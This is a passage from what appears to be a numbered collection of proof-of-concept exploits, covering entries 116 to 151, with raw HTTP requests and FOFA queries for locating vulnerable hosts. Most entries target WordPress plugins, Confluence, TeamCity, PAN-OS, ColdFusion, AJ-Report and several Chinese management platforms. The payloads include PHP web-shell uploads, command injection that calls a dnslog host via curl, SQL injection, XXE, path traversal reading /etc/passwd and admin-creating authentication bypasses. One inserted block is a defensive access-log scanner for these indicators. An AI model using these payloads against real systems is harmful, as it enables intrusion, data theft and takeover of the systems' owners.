Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress JS Support Ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Versions: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

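Most of the PoCs in this section leave their signature in the request line, which is exactly what the article's defensive readers have in their web-server access logs. Added example, not code from the original article: a small scanner that URL-decodes each request path and matches it against rules distilled from the PoCs above (the "..;/" path-parameter traversal, plain "../" traversal, updatexml() and sleep() SQL injection, the Jenkins /cli?remoting=false endpoint, the OFBiz requirePasswordChange=Y bypass, the Ivanti keys-status command injection, and file:// fetches). The log lines are constructed for the example and the rule names are my own.

```python
"""Access-log scanner for the request-line indicators in this PoC list (added example).

Input is Common Log Format. Paths are percent-decoded before matching because
several payloads above arrive encoded (e.g. SLEEP%285%29).
"""
import re
from urllib.parse import unquote_plus

# ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# (rule name, pattern applied to the decoded path); names are this example's own.
RULES = [
    ("path_param_traversal", re.compile(r"/\.\.;/")),                 # entries 91, 110
    ("dir_traversal", re.compile(r"\.\./")),                          # fileName=../.., Ivanti 101
    ("updatexml_sqli", re.compile(r"updatexml\s*\(", re.I)),          # SpringBlade 105-107
    ("time_based_sqli", re.compile(r"sleep\s*\(\s*\d+\s*\)", re.I)),  # WordPress 111, 112, 114, 117
    ("jenkins_cli", re.compile(r"^/cli\?remoting=false")),            # Jenkins 109
    ("ofbiz_password_change_bypass",
     re.compile(r"^/webtools/control/.*requirePasswordChange=Y")),    # OFBiz 95, 96
    ("ivanti_keys_status_cmdi", re.compile(r"/license/keys-status/;")),  # Ivanti 101
    ("file_scheme_fetch", re.compile(r"=file:///", re.I)),            # wp-automatic 113
]


def decode_path(raw_path: str) -> str:
    """Percent-decode and turn '+' into spaces so SQL keywords become visible."""
    return unquote_plus(raw_path)


def match_rules(decoded_path: str):
    return [name for name, pattern in RULES if pattern.search(decoded_path)]


def scan_log(lines):
    """One record per suspicious line: source IP, method, status, decoded path, rules."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        ip, _ts, method, raw_path, status, _size = m.groups()
        path = decode_path(raw_path)
        rules = match_rules(path)
        if rules:
            hits.append({"ip": ip, "method": method, "status": int(status), "path": path, "rules": rules})
    return hits


def count_by_ip(hits):
    """How many flagged requests each source produced, for triage ordering."""
    counts = {}
    for hit in hits:
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


# Constructed sample log: request lines taken from the PoCs above plus two benign ones.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2024:10:01:22 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../etc/passwd HTTP/1.1" 200 2311
203.0.113.5 - - [12/Mar/2024:10:02:01 +0800] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 412
198.51.100.7 - - [12/Mar/2024:10:03:44 +0800] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 88
198.51.100.7 - - [12/Mar/2024:10:04:10 +0800] "POST /cli?remoting=false HTTP/1.1" 200 0
198.51.100.7 - - [12/Mar/2024:10:05:00 +0800] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 150
192.0.2.9 - - [12/Mar/2024:10:06:12 +0800] "GET /wp-content/themes/bricks/assets/css/frontend.min.css HTTP/1.1" 200 51233
192.0.2.9 - - [12/Mar/2024:10:06:13 +0800] "GET /index.php?p=12 HTTP/1.1" 200 9021
198.51.100.7 - - [12/Mar/2024:10:07:30 +0800] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 0
192.0.2.9 - - [12/Mar/2024:10:08:05 +0800] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1320
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for hit in found:
        print(hit["ip"], hit["status"], ",".join(hit["rules"]), hit["path"][:70])
    print(count_by_ip(found))
```

Decoding before matching matters: the MasterStudy and LayerSlider payloads arrive as SLEEP%285%29, which a raw-string rule would miss. A hit on the Jenkins or OFBiz rule is not proof of compromise by itself (the CLI endpoint has legitimate users), so pair the rule name with the response status and the per-source counts from count_by_ip() before escalating.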
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Beijing Byzoro Smart S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro Smart S200 management platform: SQL injection via /importexport.php
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64 encoding of the SQL statement; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))


124. Hunan Jianyan engineering quality inspection system: arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system: arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall: file upload via file.php
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway: SQL injection via index.php
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway: SQL injection via list_ipAddressPolicy.php
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communications command and dispatch platform: SQL injection via down_file.php
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communications command and dispatch platform: SQL injection via pwd_update.php
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communications command and dispatch platform: SQL injection via editemedia.php
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1


140. Fujian Kirisun communications command and dispatch platform: SQL injection via get_extension_yl.php
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communications command and dispatch management platform: SQL injection via ajax_users.php
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -


142. CMSV6 vehicle monitoring platform: weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard: remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
